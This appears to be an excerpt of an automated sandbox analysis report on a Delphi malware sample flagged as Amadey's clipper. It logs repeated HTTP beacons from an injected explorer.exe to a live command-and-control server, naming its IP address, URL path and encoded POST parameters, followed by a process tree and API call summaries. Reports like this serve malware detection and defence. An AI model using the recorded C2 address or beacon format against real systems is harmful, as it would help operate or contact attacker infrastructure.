Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 58 | Source IP: 192.168.2.10 | Source Port: 49782 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:40.035778999 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:29:41.307801008 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 59 | Source IP: 192.168.2.10 | Source Port: 49783 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:42.941560984 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:29:44.244076967 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 60 | Source IP: 192.168.2.10 | Source Port: 49784 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:45.984971046 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:29:47.343539000 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 61 | Source IP: 192.168.2.10 | Source Port: 49785 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:48.970845938 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:29:50.241635084 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 62 | Source IP: 192.168.2.10 | Source Port: 49786 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:51.995702028 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:29:53.259152889 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 63 | Source IP: 192.168.2.10 | Source Port: 49787 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:54.891597033 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:29:56.163078070 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 64 | Source IP: 192.168.2.10 | Source Port: 49788 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:57.907567024 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:29:59.175875902 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 65 | Source IP: 192.168.2.10 | Source Port: 49789 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:00.813570023 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:30:02.089543104 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 66 | Source IP: 192.168.2.10 | Source Port: 49790 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:03.844510078 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:30:05.282505989 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 67 | Source IP: 192.168.2.10 | Source Port: 49791 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:06.907111883 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:30:08.180849075 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 68 | Source IP: 192.168.2.10 | Source Port: 49792 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:09.927575111 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:30:11.266268969 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 69 | Source IP: 192.168.2.10 | Source Port: 49793 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:12.893666029 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:30:14.165957928 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 70 | Source IP: 192.168.2.10 | Source Port: 49794 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:15.909370899 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:30:17.181735039 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 71 | Source IP: 192.168.2.10 | Source Port: 49795 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:18.813699007 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:30:20.087594032 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 72 | Source IP: 192.168.2.10 | Source Port: 49796 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:30:21.828835011 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:30:23.097453117 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:30:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


                                                Session ID: 73 | Source IP: 192.168.2.10 | Source Port: 49797 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:30:24.736413956 CET | 305 bytes | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:26.007086992 CET | 196 bytes | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 74 | Source IP: 192.168.2.10 | Source Port: 49798 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:30:27.759300947 CET | 155 bytes | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:30:29.046945095 CET | 219 bytes | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:28 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 75 | Source IP: 192.168.2.10 | Source Port: 49799 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:30:30.681500912 CET | 305 bytes | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:31.953548908 CET | 196 bytes | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:31 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0



                                                Target ID:0
                                                Start time:09:26:26
                                                Start date:16/12/2024
                                                Path:C:\Users\user\Desktop\pTvHtQDXio.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\pTvHtQDXio.exe"
                                                Imagebase:0x400000
                                                File size:14'014'536 bytes
                                                MD5 hash:7C23CCA92DDABC20911E0C51E19B002B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Borland Delphi
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:09:26:27
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\more.com
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\more.com
                                                Imagebase:0x750000
                                                File size:24'576 bytes
                                                MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:3
                                                Start time:09:26:27
                                                Start date:16/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff620390000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:09:26:36
                                                Start date:16/12/2024
                                                Path:C:\Users\user\AppData\Roaming\ancar\comet.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\ancar\comet.exe
                                                Imagebase:0x400000
                                                File size:14'014'536 bytes
                                                MD5 hash:7C23CCA92DDABC20911E0C51E19B002B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:Borland Delphi
                                                Reputation:low
                                                Has exited:true

                                                Target ID:9
                                                Start time:09:26:37
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640
                                                Imagebase:0xe20000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:09:26:38
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                Imagebase:0xb30000
                                                File size:4'514'184 bytes
                                                MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:40%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:5.6%
                                                  Total number of Nodes:143
                                                  Total number of Limit Nodes:7
                                                  execution_graph: rendered graph not reproduced (entry node 76ba55; API calls reached along the graph: GetPEB, GlobalAlloc, LoadLibraryW, NtQuerySystemInformation, CreateFileW, ReadFile, CloseHandle, VirtualProtect, WriteFile, malloc)

                                                  Callgraph

                                                  callgraph: rendered graph not reproduced (nodes Function_00769007 through Function_0076C7DF, with edges between internal subroutines)

                                                  Control-flow Graph

                                                  control_flow_graph: function 76a6d5 (basic blocks 76a6d5-76a840; rendered graph not reproduced; calls 76a675, 76a0e5, NtQuerySystemInformation, 76a4a5 and 769d25)
                                                  APIs
                                                    • Part of subcall function 0076A675: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                  • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 0076A739
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobalInformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3737350999-0
                                                  • Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                  • Instruction ID: 341150ab29847415fbd6ffaecd52f22fcb3606a6634f7b85f713994eae00b212
                                                  • Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                  • Instruction Fuzzy Hash: 5D51D8B5D0020AEFCB04DF98C884AAEB7B5BF48300F148559E916B7344D779AE41DFA1

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00769FD7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                  • Instruction ID: 730d262103e5a0a9a0967f094f4a8946f5ed6298b18799b2bdef6c7fa2fa7368
                                                  • Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                  • Instruction Fuzzy Hash: B9319975A00108FFDB14DF98C891F9EB7B9AF49710F20C198E919AB291E635AE41DB90

                                                  Control-flow Graph

                                                  control_flow_graph: function 76adf5 (basic blocks 76adf5-76ba4c; rendered graph not reproduced; calls many internal subroutines and reaches VirtualProtect twice via 769f65)
                                                  APIs
                                                    • Part of subcall function 0076A675: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                    • Part of subcall function 00769BE5: LoadLibraryW.KERNELBASE(?), ref: 00769C16
